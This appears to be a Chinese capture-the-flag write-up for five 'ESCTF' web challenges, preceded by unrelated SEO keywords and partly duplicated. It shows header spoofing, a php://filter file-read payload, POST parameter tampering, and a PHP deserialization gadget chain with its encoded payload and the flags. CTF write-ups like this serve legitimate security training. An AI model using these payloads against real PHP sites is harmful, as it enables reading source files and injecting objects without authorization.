网站开发需解决的难题,网站维护意义,wordpress评论分页,网站经营范围0x01-初次见面-怦然心动:your name? 随便输入一个字 根据提示可以看到 我们需要看源代码 直接 搜索 secret 关键字或者 ESCTF flag ESCTF{K1t0_iS_S0_HAPPy} 0x02-小k的请求 更安全的传参 post 参数为ESCTF 值为 love 自己的ip 同时还有个要求 是需要从度娘转过来 https://www…0x01-初次见面-怦然心动:your name? 随便输入一个字 根据提示可以看到 我们需要看源代码 直接 搜索 secret 关键字或者 ESCTF flag ESCTF{K1t0_iS_S0_HAPPy} 0x02-小k的请求 更安全的传参 post 参数为ESCTF 值为 love 自己的ip 同时还有个要求 是需要从度娘转过来 https://www.baidu.com/ 此时需要两个请求标头 一是X-Forwarded-For 和 Referer flag ESCTF{Have__Good_DAY_t0dAy} 0x03-传奇故事-多多包涵 发现url 中包含了k1t0.php 根据提示 flag.php 我们直接可以伪协议读取 文件 index.php?k1php://filter/read/convert.base64-encode/resourceflag.php base64 解码 PD9waHAKIkVTQ1RGe0sxdDBfSTJfYmlHX2hlck99IgogICAgPz4K flag ESCTF{K1t0_I2_biG_herO} 0x04-11真的好难 可以看到 传递了11的答案并且是用post传递的参数 根据页面提示:question1 我只是限制了不能从前端按钮传参 可以直接用hackbar post参数: question12question23 flag ESCTF{EXPLO_ReSec_RISK!!!} 0x05-喂,我不叫喂我叫k1t0 解答 ?php
class K1t0
{protected $k1base64 f*;}
class Breeze
{public $rce;public $str;}
class QWQ
{public $p;}
$anew Breeze();
$a-strnew QWQ();
$a-str-pnew K1t0();echo urlencode(serialize($a));?在url中10000/?k1t0O%3A6%3A%22Breeze%22%3A2%3A%7Bs%3A3%3A%22rce%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A3%3A%22QWQ%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A4%3A%22K1t0%22%3A1%3A%7Bs%3A5%3A%22%00%2A%00k1%22%3Bs%3A9%3A%22base64f%2A%22%3B%7D%7D%7D 得到RVNDVEZ7S0AhdDBfRVhQTE9yXzJSX1RlUU19Cg base64解码 flag ESCTF{K!t0_EXPLOr_2R_TeQM}